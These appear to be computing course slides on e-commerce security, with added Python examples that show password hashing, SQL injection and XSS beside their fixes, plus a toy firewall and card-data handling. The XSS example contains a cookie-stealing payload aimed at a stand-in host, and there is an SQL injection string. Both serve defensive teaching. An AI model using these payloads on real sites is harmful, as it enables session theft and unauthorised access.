Security Unit 1 Business skills for e-commerce


Security Unit 1 Business skills for e-commerce HND in Computing and Systems Development

Timeline

Week  Activity                     Week  Activity
1     Introduction & Businesses    10    Assignment 2 LO2
2     LO1 Stakeholders             11    LO3 Key processes
3     LO1 Functions                12    LO3 e-commerce
4     (none listed)                13    LO3 Security - 1
5     LO2 Impacts                  14    LO3 Security - 2
6     Assignment 1 LO1             15    LO3 Legislation
7     LO3 Target markets           16    Assignment 3 LO3 issued
8     LO3 Objectives               17    Assignment work
9     LO3 Market research          18    (none listed)

LO3: Be able to design e-Commerce solutions

Objectives: business idea eg unique selling proposition, business-to-business opportunities, business-to-consumer markets; domain name
Market research: purpose of research eg identifying information sources, online and offline competition; types of research eg primary, secondary
Target markets: market analysis eg size, characteristics, dynamics, competitors, historical background, emerging trends, market share, market segmentation
Key processes: technology requirements eg hardware, software, security, maintenance, back end systems; supply sources; distribution channels
e-Commerce: payment systems eg electronic cheque, PayPal, NoChex, credit or debit cards; start-up capital; working capital; funding sources
Security: key areas eg prevention of hacking, viruses, identity theft, firewall, impact on site performance, Secure Sockets Layer (SSL), HTTPS (HTTP over SSL/TLS), digital certificates, strong passwords, alternative authentication methods
Legislation: relevant legislation eg Data Protection Act 1998, Computer Misuse Act 1990, Consumer Credit Act 1974, Trading Standards, Freedom of Information Act 2000, copyright legislation

LO3 Criteria
3.1 investigate market potential for an e-Commerce opportunity
3.2 evaluate current e-Commerce systems in use by organisations
3.3 discuss the financial implications of an e-Commerce solution
3.4 design an e-Commerce solution
3.5 evaluate the suitability of an e-Commerce solution

Participants
- Customer: purchases the products or services
- Merchant: owns or leases the e-commerce systems
- Software vendor: supplies the software to run the systems
- Attacker: exploits the other three for illegitimate gains

Points of attack
- The customer
- The customer's computer
- The network connection between the customer's computer and the merchant's server
- The merchant
- The web site's server
- The software vendor

Attacks
- Tricking the customer: calling and extracting information, then using it to con the merchant
- Phishing: false web sites linked from emails, or registered URL typos (eg applr.com)

Customers' computers
- Port scanning: nmap is a security scanner used to discover hosts and the services they expose on a network
- Keystroke loggers: distributed by virus, worm or Trojan

Network attacks
- IP address spoofing: pretending to be a legitimate PC on a LAN or WAN
- Packet sniffing: capturing unencrypted or poorly protected (wireless) traffic
- False wi-fi hotspots

Fraud
- Chargeback fraud: claiming delivered goods were never received
- Stolen cards
- Identity theft: falsely authenticating with stolen or faked documents to create accounts

Web server attacks
- Password guessing: manual or automated, using lists of common passwords or rainbow tables (precomputed tables that map password hashes back to the passwords; they only work against unsalted hashes)
- Denial of service (DoS): ping of death, ping flood, botnets (distributed DoS)
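The password-guessing point above is easiest to see in code. The following is an added example (not part of the original slides): it builds the simple dictionary form of a precomputed hash-to-password table (a rainbow table is a space-saving encoding of the same idea), shows it recovering an unsalted SHA-256 password hash with one lookup, and shows why a per-user random salt plus a slow key derivation (PBKDF2 here) makes that table useless. The password list and the users' passwords are constructed for the demo; the iteration count is an assumption.

```python
"""Added example (not part of the original slides): precomputed hash lookup
against unsalted hashes versus salted PBKDF2.  Passwords are constructed."""
import hashlib
import hmac
import os
from typing import Optional

# Constructed stand-in for a "common passwords" list.  A real rainbow table
# is a compressed version of the same thing: hash -> password, computed once.
COMMON_PASSWORDS = ["password", "123456", "qwerty", "letmein", "admin123"]
ITERATIONS = 100_000   # PBKDF2 work factor (assumption; tune to your hardware)


def unsalted_hash(password: str) -> str:
    """What a naive site stores: one bare SHA-256 of the password."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_lookup_table(candidates) -> dict:
    """Attacker's precomputation: built once, reused against every site."""
    return {unsalted_hash(p): p for p in candidates}


def crack_unsalted(stored_hash: str, table: dict) -> Optional[str]:
    """No guessing at all: a single dictionary lookup."""
    return table.get(stored_hash)


def salted_hash(password: str, salt: Optional[bytes] = None) -> tuple:
    """Per-user random salt + PBKDF2-HMAC-SHA256.  Returns (salt, derived_key)."""
    if salt is None:
        salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def verify_salted(password: str, salt: bytes, expected: bytes) -> bool:
    """Recompute with the stored salt; compare in constant time."""
    _, dk = salted_hash(password, salt)
    return hmac.compare_digest(dk, expected)


def demo() -> dict:
    table = build_lookup_table(COMMON_PASSWORDS)
    # Two users picked the same weak password.
    alice_plain, bob_plain = unsalted_hash("letmein"), unsalted_hash("letmein")
    salt_a, alice_salted = salted_hash("letmein")
    _, bob_salted = salted_hash("letmein")
    return {
        # Unsalted: identical hashes, and the table hands the password back at once.
        "unsalted_identical": alice_plain == bob_plain,
        "unsalted_cracked_as": crack_unsalted(alice_plain, table),
        # Salted: same password, different stored values, the table finds nothing,
        # and an attacker must repeat ITERATIONS rounds per guess per user.
        "salted_identical": alice_salted == bob_salted,
        "salted_table_hit": table.get(alice_salted.hex()),
        "login_correct": verify_salted("letmein", salt_a, alice_salted),
        "login_wrong": verify_salted("letmeout", salt_a, alice_salted),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:22s} {value}")
```

The salt does not have to be secret; it only has to be unique per user, so that no table computed in advance matches anyone's stored value and every guess costs the attacker a full key derivation.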

Software vulnerabilities
- Buffer overflow attacks: poor code lets input overrun a fixed-size buffer and overwrite adjacent memory, so an attacker can run code with the privileges of the vulnerable program (root, if it runs as root)
- SQL injection: malicious SQL statements inserted through unvalidated input and executed by the database
- Cross site scripting (XSS): malicious scripts inserted into legitimate web sites and run in other visitors' browsers
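An added example (not from the original slides) of the two web vulnerabilities above, each beside its fix: a login query built by string concatenation that an attacker can turn into "always true", the same query with bound parameters, and a greeting page that reflects a name into HTML unescaped versus escaped. The users table, its rows and the payloads are constructed; passwords are stored in clear only so the injection is visible in a few lines (a real system stores salted hashes).

```python
"""Added example (not part of the original slides): SQL injection and reflected
XSS, vulnerable form beside the hardened form.  All data is constructed."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> bool:
    # Attacker-controlled text becomes part of the SQL statement itself.
    query = (f"SELECT COUNT(*) FROM users WHERE name = '{name}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, name: str, password: str) -> bool:
    # Placeholders: the driver passes the values separately from the statement,
    # so no input can change the statement's structure.
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?",
        (name, password),
    ).fetchone()
    return row[0] > 0


# Classic payload: closes the password literal and appends a true condition.
# With the concatenated query this yields
#   ... AND password = '' OR '1'='1'
INJECTION = "' OR '1'='1"


def render_greeting_vulnerable(name: str) -> str:
    # Whatever the visitor typed is emitted as markup.
    return f"<p>Welcome, {name}!</p>"


def render_greeting_safe(name: str) -> str:
    # html.escape turns < > & " ' into entities, so the browser shows text,
    # not a script tag.
    return f"<p>Welcome, {html.escape(name)}!</p>"


# Constructed XSS payload: steals the session cookie of whoever views the page.
XSS_PAYLOAD = '<script>location="http://evil.example/?c="+document.cookie</script>'


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login, injected password:", login_vulnerable(db, "alice", INJECTION))
    print("safe login, injected password:     ", login_safe(db, "alice", INJECTION))
    print(render_greeting_vulnerable(XSS_PAYLOAD))
    print(render_greeting_safe(XSS_PAYLOAD))
```

The hardened forms are the whole fix: parameterised queries for every statement that carries user input, and output encoding appropriate to the context (HTML body here; attribute, URL and JavaScript contexts each need their own encoder).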

Exploit tools
SAINT exploit tools penetration-test servers (but do not exploit them). Examples are:
- Chrome password grabber
- OS X 10.7 user name and hash grabber
- Reverse shell applet: delivers a signed Java applet
- ARP spoof tool for man-in-the-middle attacks
- Automatic drive-by download
- Flash drive trojan that opens connections when run by AutoPlay or Open Folder

Defences
- Choose a secure e-commerce platform
  - PCI DSS (Payment Card Industry Data Security Standard) compliant
  - Run regular PCI audit scans
- Use SSL security (in practice TLS today; the SSL protocol versions themselves are obsolete and should be disabled)
  - Trusted certificates
  - Encrypted connections
- Even better, use EV SSL (Extended Validation certificates)
  - More extensive vetting of the organisation before the certificate is issued
  - Historically shown as a green bar or company name in the browser address bar; mainstream browsers dropped that indicator in 2019, so EV no longer gives customers a visible cue

Defences: firewalls
- Packet filtering: inspect incoming and outgoing packets to make sure the source or destination addresses and ports are legitimate
- Stateful: is this packet part of a legitimate, already established connection?
- Application layer: detects illegitimate protocol or port usage (for example non-HTTP traffic on the HTTP port)
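The three inspection levels above, as an added example (not from the original slides): a toy firewall that decides on a handful of constructed packets first by address and port alone, then by whether the packet answers a connection an inside host opened, and finally by whether the bytes on port 80 actually look like HTTP. The LAN prefix 192.168.1.x, the published ports and the outside addresses (documentation ranges 203.0.113.x and 198.51.100.x) are assumptions for the demo.

```python
"""Added example (not part of the original slides): packet-filter, stateful
and application-layer checks on constructed packets."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

INSIDE_NET = "192.168.1."   # assumption: the merchant's LAN prefix
# Minimal test that bytes arriving on port 80 begin like an HTTP request line.
HTTP_REQUEST = re.compile(rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS) \S+ HTTP/1\.[01]\r\n")


@dataclass(frozen=True)
class Packet:
    iface: str            # "wan" (arrived from the Internet) or "lan" (from inside)
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False     # TCP SYN: this packet opens a new connection
    payload: bytes = b""


def is_inside(addr: str) -> bool:
    return addr.startswith(INSIDE_NET)


@dataclass
class Firewall:
    served_ports: frozenset = frozenset({80, 443})   # the shop's public services
    connections: set = field(default_factory=set)    # 4-tuples opened from inside

    def decide(self, p: Packet) -> tuple[str, str]:
        # 1. Packet filtering: judge on addresses and ports alone.
        if p.iface == "wan" and is_inside(p.src):
            return "DROP", "filter: inside address arriving from outside (spoofed)"
        if p.iface == "lan":
            if p.syn:   # remember what the inside opened, for the reply check below
                self.connections.add((p.src, p.sport, p.dst, p.dport))
            return "ACCEPT", "filter: outbound traffic"
        # 2. Stateful: is this the reply leg of a connection an inside host opened?
        if (p.dst, p.dport, p.src, p.sport) in self.connections:
            return "ACCEPT", "stateful: reply to a connection we opened"
        if p.dport not in self.served_ports:
            return "DROP", "filter: unsolicited traffic to an unpublished port"
        # 3. Application layer: the port is open, but is the protocol the right one?
        if p.dport == 80 and p.payload and not HTTP_REQUEST.match(p.payload):
            return "DROP", "application: non-HTTP data on the HTTP port"
        return "ACCEPT", "application: well-formed request to a published service"


def demo() -> dict[str, str]:
    fw = Firewall()
    traffic = [   # constructed packets, in arrival order
        ("spoof", Packet("wan", "192.168.1.10", 4444, "192.168.1.20", 445)),
        ("outbound", Packet("lan", "192.168.1.20", 51000, "203.0.113.5", 443, syn=True)),
        ("reply", Packet("wan", "203.0.113.5", 443, "192.168.1.20", 51000)),
        ("rdp_probe", Packet("wan", "198.51.100.9", 51000, "192.168.1.20", 3389)),
        ("web", Packet("wan", "198.51.100.9", 40000, "192.168.1.20", 80,
                       payload=b"GET /cart HTTP/1.1\r\nHost: shop.example\r\n\r\n")),
        ("tunnel", Packet("wan", "198.51.100.9", 40001, "192.168.1.20", 80,
                          payload=b"SSH-2.0-OpenSSH_8.9\r\n")),
    ]
    return {name: fw.decide(p)[0] for name, p in traffic}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:10s} {verdict}")
```

Note what each layer buys: without the connection table, the legitimate reply to port 51000 would be dropped by the port rule; without the application check, anything tunnelled over port 80 would pass.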

UTM (unified threat management): a single appliance combining
- network firewalling
- network intrusion prevention
- gateway antivirus (AV)
- gateway anti-spam
- VPN
- content filtering
- load balancing
- data leak prevention
- on-appliance reporting

Sensible precautions
- Don't store credit card details
- Use an address verification (AVS) and card verification (CVV) service
- Enforce strong passwords
- Detect suspicious activity (software is available for this)
- Use tracking for delivery of all orders
- Apply all patches and updates
- Have a sound backup
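An added example (not from the original slides) of the first two precautions in code: check a card number before sending it to the processor (the Luhn checksum every card brand uses), keep only the masked form that PCI DSS allows to be displayed (at most the first six and last four digits), and build an order record that never contains the full number or the verification code. The card numbers are the brands' published test numbers; the record layout is an assumption.

```python
"""Added example (not part of the original slides): Luhn check, PAN masking,
and an order record that keeps no full card data.  Layout is an assumption."""


def luhn_valid(pan: str) -> bool:
    """Luhn checksum: catches typos and junk before anything is sent to the processor."""
    digits = [int(c) for c in pan if c.isdigit()]
    if not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):   # i == 0 is the check digit
        if i % 2 == 1:                          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """PCI DSS display rule: at most the first six and last four digits visible."""
    digits = "".join(c for c in pan if c.isdigit())
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def record_order(order_id: str, pan: str, cvv: str) -> dict:
    """Validate what the customer typed, then return only what the shop may keep.
    The full PAN and the CVV are passed to the payment processor and discarded;
    the CVV in particular must never be stored anywhere after authorisation."""
    if not luhn_valid(pan):
        raise ValueError("card number fails Luhn check")
    if not (cvv.isdigit() and 3 <= len(cvv) <= 4):
        raise ValueError("card verification code must be 3 or 4 digits")
    digits = "".join(c for c in pan if c.isdigit())
    return {
        "order_id": order_id,
        "card_masked": mask_pan(digits),
        "card_last4": digits[-4:],
        # no "pan", no "cvv": nothing here is worth stealing
    }


if __name__ == "__main__":
    print(record_order("A1001", "4111 1111 1111 1111", "123"))
    print(luhn_valid("4111111111111112"))   # one digit off: rejected
```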

Activity
- Match the threats to the defences: determine what the correct defence is for each threat
- Determine what security measures are appropriate for an SME e-commerce business:
  - Local defences
  - Hosted defences
  - Services that can be used